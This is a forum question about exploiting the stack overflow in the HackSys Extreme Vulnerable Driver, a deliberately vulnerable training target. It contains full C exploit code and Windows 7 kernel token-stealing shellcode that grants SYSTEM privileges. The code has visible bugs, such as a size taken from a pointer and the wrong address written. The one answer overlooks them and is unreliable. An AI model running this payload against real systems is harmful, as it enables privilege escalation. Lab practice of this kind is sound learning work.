# Assigning memory address of shellcode to buffer (for buffer overflow input)

Tags: buffer-overflow, memory, c, exploit-development, kernel

I am attempting to exploit HEVD kernel driver buffer overflow challenge:
https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

However when running the below code my windows 7 machine doesn't execute the desired shellcode (assign current process with SYSTEM token):

```
#include <windows.h>
#include <stdio.h>

int main(void) {
    char *buf = malloc(2084);
    RtlFillMemory(buf, 2080, 0x41);
    HANDLE driver_hndle = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, NULL, 0x3, 0, NULL);
    
    //unsigned char payload[] = "\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61\x5d\xc2\x08\x00";
    unsigned char payload[] = {
        0x60, 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, 0x8B, 0x40, 0x50, 0x89, 0xC1,
        0xBA, 0x04, 0x00, 0x00, 0x00, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x2D,
        0xB8, 0x00, 0x00, 0x00, 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, 0x75, 0xED,
        0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, 0x8B, 0xB9, 0xF8, 0x00, 0x00, 0x00,
        0x83, 0xE2, 0xF8, 0x83, 0xE7, 0x07, 0x01, 0xFA, 0x89, 0x91, 0xF8, 0x00,
        0x00, 0x00, 0x61, 0x31, 0xC0, 0x5D, 0xC2, 0x08, 0x00
    };

    size_t payload_sz = sizeof(payload);
    LPVOID payload_ptr = VirtualAlloc(0, payload_sz, 0x3000, 0x40);

    RtlMoveMemory(payload_ptr, payload, payload_sz);

    DWORD* address_field = (DWORD*)(buf + 2080);
    *address_field = (DWORD)(&payload_ptr);

    DWORD size_return = 0;
    DeviceIoControl(driver_hndle, 0x222003, buf, sizeof(buf), NULL, 0, &size_return, NULL);
    free(buf);

    return 0;
}
```

I believe the issue is: Pointing the last 4 bytes of `buf` to the memory address returned from `VirtualAlloc`. I've also tried:

```
memcpy(buf + 2080, &payload_ptr, sizeof(payload_ptr));
```

Being this shellcode is universally capable of being executed on any windows 7 machine, I do not believe the issue lies within the shellcode. I've tested the shellcode within a python poc with the expected results (nt authority/system cmd.exe opening). The shellcode steals the token of SYSTEM process `0x4` and assigns it to a new cmd.exe process and spawns it. Can anyone help me understand what I'm doing wrong here?

Answer (score 0):

The issue was because I was not spawning a `cmd.exe` process via `_popen` or `system` post shellcode execution.